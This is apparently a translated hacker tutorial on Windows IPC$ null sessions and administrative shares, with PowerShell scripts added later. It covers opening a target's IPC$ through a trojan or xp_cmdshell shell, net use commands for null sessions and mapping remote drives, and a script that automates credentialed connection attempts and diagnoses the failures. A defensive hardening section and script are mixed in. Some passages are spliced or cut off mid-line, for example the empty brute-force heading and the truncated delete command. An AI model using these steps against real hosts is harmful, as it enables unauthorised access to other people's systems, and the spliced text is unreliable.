The default shares are opened by default to make remote administration convenient (you can of course turn them off): every logical disk (C$, D$, E$, ...) and the system directory WinNT or Windows (ADMIN$). We can access these default shares through an IPC$ connection (provided the other side has not turned them off).

5. Reasons why an IPC$ connection fails
The following five reasons are the common ones:
1) your own system is not NT or later
2) the other side has not opened the IPC$ default share
3) the other side's port 139 or 445 is not open (blocked by a firewall)
4) your command was typed wrongly (a missing space, for example)
5) the user name or password is wrong (for a null session this does not apply)
In addition, you can analyse the cause from the error number returned:
Error 5, Access is denied: most likely the account you used does not have administrator permissions; escalate first.
Error 51, Windows cannot find the network path: there is a problem with the network.
Error 53, The network path was not found: wrong IP address; the target is switched off; the target's lanmanserver service is not started; the target has a firewall (port filtering).
Error 67, The network name cannot be found: your own lanmanworkstation service is not started; the target has deleted IPC$.
Error 1219, The credentials supplied conflict with an existing set of credentials: you already have an IPC$ connection to the other side; delete it and connect again.
Error 1326, Unknown user name or bad password: the reason is obvious.
Error 1792, An attempt was made to logon, but the network logon service was not started: the target's Netlogon service is not started (this happens when connecting to a domain controller).
Error 2242, The password of this user has expired: the target has an account policy that forces regular password changes.
Apart from the reasons above there are some other uncertain factors that I cannot explain definitely here; rely on your own experience and experiments.

6. How to open the target's IPC$ (this paragraph is quoted from related articles)
First of all, you need a shell that does not depend on IPC$, such as the cmd extension of SQL Server (xp_cmdshell) or a telnet trojan; of course this shell must have admin permissions. Then use it to execute the command net share IPC$ to open the target's IPC$. As you can see from the above, there are many preconditions for IPC$ to be usable: make sure all the related services are running, and if they are not, start them (if you don't know how, see the usage of the net command). If it still does not work (for example a firewall you cannot kill), it is advisable to give up.

7. How to prevent IPC$ intrusion
1. Prohibit enumeration through null sessions (this does not prevent a null session from being established; quoted from "Dissecting null sessions under Win2000").
Run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] and set the DWORD value RestrictAnonymous to 1 (setting it to 2 causes problems, for example some Windows services stop working).

2. Disable the default shares
1) view the local shared resources
Run -> cmd -> enter: net share
2) delete the shares (one at a time)
net share IPC$ /delete
net share ADMIN$ /delete
net share C$ /delete
net share D$ /delete (continue with E, F, ... if present)
3) stop the Server service
net stop server /y (the Server service starts again after a reboot, and the default shares come back with it)
4) modify the registry
Run -> regedit
Server versions: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the DWORD value AutoShareServer to 0
Professional versions: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the DWORD value AutoShareWks to 0
If the value does not exist, create it (right-click -> New -> DWORD value) and then set it.

3. Permanently turn off IPC$ and the service the default shares depend on: lanmanserver, i.e. the Server service
Control Panel -> Administrative Tools -> Services -> find the Server service -> right-click -> Properties -> General -> Startup type -> Disabled

4. Install a firewall (choose the relevant settings), or a port filter (filter out 139, 445, etc.), or use a recent version of Optimization Master to do this; and set a complex password.

5. Prevent password brute-forcing through IPC$
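The steps in section 7 are all done by hand through regedit, net share and the Services console. As an added example (my code, not part of the original tutorial), the following PowerShell audits the same settings and applies them in one go. It assumes an elevated prompt and Windows 8 / Server 2012 or later, where Get-SmbShare, Remove-SmbShare, Set-Service and New-NetFirewallRule exist; on 2000/XP use the manual steps above. The RestrictAnonymousSAM value it sets is not mentioned on this page; it is my addition, because on XP/2003 and later RestrictAnonymous=1 alone no longer stops account enumeration.

```powershell
# Added example: audit and apply the countermeasures from section 7.
# Not part of the original tutorial. Run from an elevated PowerShell.

$LsaKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$ServerKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-IpcExposure {
    # Report the current state of everything section 7 touches.
    $lsa = Get-ItemProperty -Path $LsaKey
    $srv = Get-ItemProperty -Path $ServerKey
    $special = Get-SmbShare | Where-Object Special | Select-Object -ExpandProperty Name
    $svc = Get-Service LanmanServer
    [pscustomobject]@{
        RestrictAnonymous    = $lsa.RestrictAnonymous       # $null if never set (behaves as 0)
        RestrictAnonymousSAM = $lsa.RestrictAnonymousSAM    # my addition, see lead-in
        AutoShareServer      = $srv.AutoShareServer         # $null means the default (1)
        AutoShareWks         = $srv.AutoShareWks
        AdminShares          = $special                     # e.g. ADMIN$, C$, IPC$
        ServerService        = $svc.Status
        ServerStartType      = $svc.StartType
    }
}

function Disable-IpcExposure {
    param(
        # Item 3: disable the Server service. This also ends file and printer
        # sharing for everyone, so it is opt-in here.
        [switch]$DisableServerService,
        # Item 4: block inbound 139/445 with Windows Firewall.
        [switch]$BlockSmbPorts
    )
    # Item 1: stop anonymous enumeration. Value 1, not 2: the tutorial warns
    # that 2 breaks some services. New-ItemProperty -Force creates or overwrites.
    New-ItemProperty -Path $LsaKey -Name RestrictAnonymous -Value 1 -PropertyType DWord -Force | Out-Null
    # Not in the tutorial: on XP/2003 and later this value, not RestrictAnonymous,
    # is what blocks anonymous SAM account enumeration.
    New-ItemProperty -Path $LsaKey -Name RestrictAnonymousSAM -Value 1 -PropertyType DWord -Force | Out-Null

    # Item 2(4): stop the default shares being recreated when the Server service
    # starts. Setting both values is harmless on either edition.
    foreach ($name in 'AutoShareServer', 'AutoShareWks') {
        New-ItemProperty -Path $ServerKey -Name $name -Value 0 -PropertyType DWord -Force | Out-Null
    }

    # Item 2(2): delete the administrative shares that exist right now
    # (ADMIN$, C$, D$, ..., IPC$). IPC$ itself comes back whenever the Server
    # service restarts, whatever AutoShare* says; only item 3 removes it for good.
    Get-SmbShare | Where-Object Special | ForEach-Object {
        Remove-SmbShare -Name $_.Name -Force
    }

    if ($BlockSmbPorts) {
        New-NetFirewallRule -DisplayName 'Block inbound SMB (139/445)' -Direction Inbound `
            -Protocol TCP -LocalPort 139, 445 -Action Block | Out-Null
    }

    if ($DisableServerService) {
        # Startup type Disabled survives a reboot, unlike "net stop server /y".
        Stop-Service LanmanServer -Force
        Set-Service LanmanServer -StartupType Disabled
    }
}

# Usage:
# Get-IpcExposure                        # state before
# Disable-IpcExposure -BlockSmbPorts     # items 1, 2 and 4
# Get-IpcExposure                        # state after
```

Get-IpcExposure is the check to run first and after a reboot: if AdminShares still lists C$ or ADMIN$ after a restart, the AutoShare* value for that edition was not honoured or the Server service was re-enabled.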

(This tutorial is updated from time to time. For the latest version, please visit the official site: the caicainiao community, http://ccbirds.yeah.net)

8. Related commands
1) establish a null session:
net use \\IP\ipc$ "" /user:"" (note that this command contains three spaces)

2) establish a non-null connection:
net use \\IP\ipc$ "password" /user:"user name" (also three spaces)

3) map a default share:
net use Z: \\IP\c$ "password" /user:"user name" (maps the other side's C drive to your own Z drive, and so on)
If an IPC$ connection to the target already exists, you can access it directly with IP + drive letter + $: net use Z: \\IP\C$

4) delete an IPC$ connection:
\IP
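Typing the section 8 commands by hand and reading the error numbers against the list in section 5 is tedious. As an added example (my code, not the tutorial's), the following PowerShell wraps the same net use forms, checks ports 139/445 first as section 4 suggests, and maps the "System error NNN" code that net.exe prints to the causes listed in section 5. It assumes an English-language Windows (net.exe prints localized text elsewhere and the regex will not match), Windows 8 / Server 2012 or later for Test-NetConnection, and a lab address of 192.0.2.10 in the usage lines, which is a placeholder.

```powershell
# Added example: IPC$ connection attempts with error-number diagnosis.
# Not part of the original tutorial.

function Test-SmbPorts {
    # Section 4: an IPC$ connection needs 139 (NetBIOS session) or 445 (direct SMB).
    param([Parameter(Mandatory)][string]$Target)
    $result = @{}
    foreach ($port in 139, 445) {
        $result[$port] = Test-NetConnection -ComputerName $Target -Port $port `
            -InformationLevel Quiet -WarningAction SilentlyContinue
    }
    return $result
}

# Error numbers and their usual causes, as listed in section 5.
$IpcErrorCauses = @{
    5    = 'Access denied: the account is not an administrator (or anonymous access is restricted).'
    51   = 'Windows cannot find the network path: network problem.'
    53   = 'Network path not found: wrong IP, host down, Server service stopped, or 139/445 filtered.'
    67   = 'Network name not found: local Workstation service stopped, or the target deleted IPC$.'
    1219 = 'Credential conflict: an IPC$ session to this host already exists; delete it first.'
    1326 = 'Unknown user name or bad password.'
    1792 = 'Netlogon service not started on the target (seen with domain controllers).'
    2242 = 'Password expired: the target enforces a password-change policy.'
}

function Connect-IpcShare {
    # Empty $User and $Password give the null-session form from section 8:
    #   net use \\IP\ipc$ "" /user:""
    param(
        [Parameter(Mandatory)][string]$Target,
        [string]$User = '',
        [string]$Password = ''
    )
    # Go through cmd.exe so the empty "" arguments survive: Windows PowerShell 5.1
    # drops empty-string arguments to native programs. cmd also merges stderr
    # (where net.exe prints "System error NNN has occurred.") into stdout.
    $cmdLine = "net use \\$Target\ipc`$ `"$Password`" /user:`"$User`" 2>&1"
    $output  = cmd.exe /c $cmdLine | Out-String
    $exit    = $LASTEXITCODE

    $code = $null
    if ($output -match 'System error (\d+)') { $code = [int]$Matches[1] }

    $cause = $null
    if ($code -and $IpcErrorCauses.ContainsKey($code)) {
        $cause = $IpcErrorCauses[$code]
    } elseif ($exit -ne 0) {
        $cause = "Unrecognised failure: $($output.Trim())"
    }

    [pscustomobject]@{
        Target      = $Target
        NullSession = ($User -eq '' -and $Password -eq '')
        Succeeded   = ($exit -eq 0)
        ErrorCode   = $code
        Cause       = $cause
    }
}

function Disconnect-IpcShare {
    # Tear the session down so that a later attempt does not hit error 1219.
    param([Parameter(Mandatory)][string]$Target)
    cmd.exe /c "net use \\$Target\ipc`$ /delete /y 2>&1" | Out-Null
    return ($LASTEXITCODE -eq 0)
}

# Usage (192.0.2.10 is a placeholder lab address):
# $ports = Test-SmbPorts -Target 192.0.2.10
# if (-not ($ports[139] -or $ports[445])) { 'neither 139 nor 445 reachable: reason 3 in section 5' }
# Connect-IpcShare -Target 192.0.2.10                                         # null session
# Connect-IpcShare -Target 192.0.2.10 -User administrator -Password 'secret'  # authenticated
# Disconnect-IpcShare -Target 192.0.2.10
```

The port check comes first because a filtered 445 and a stopped Server service both surface as error 53, which the table cannot tell apart; seeing both ports closed before the attempt settles it. Always call Disconnect-IpcShare between attempts with different credentials, otherwise the second attempt fails with 1219 regardless of whether the password was right.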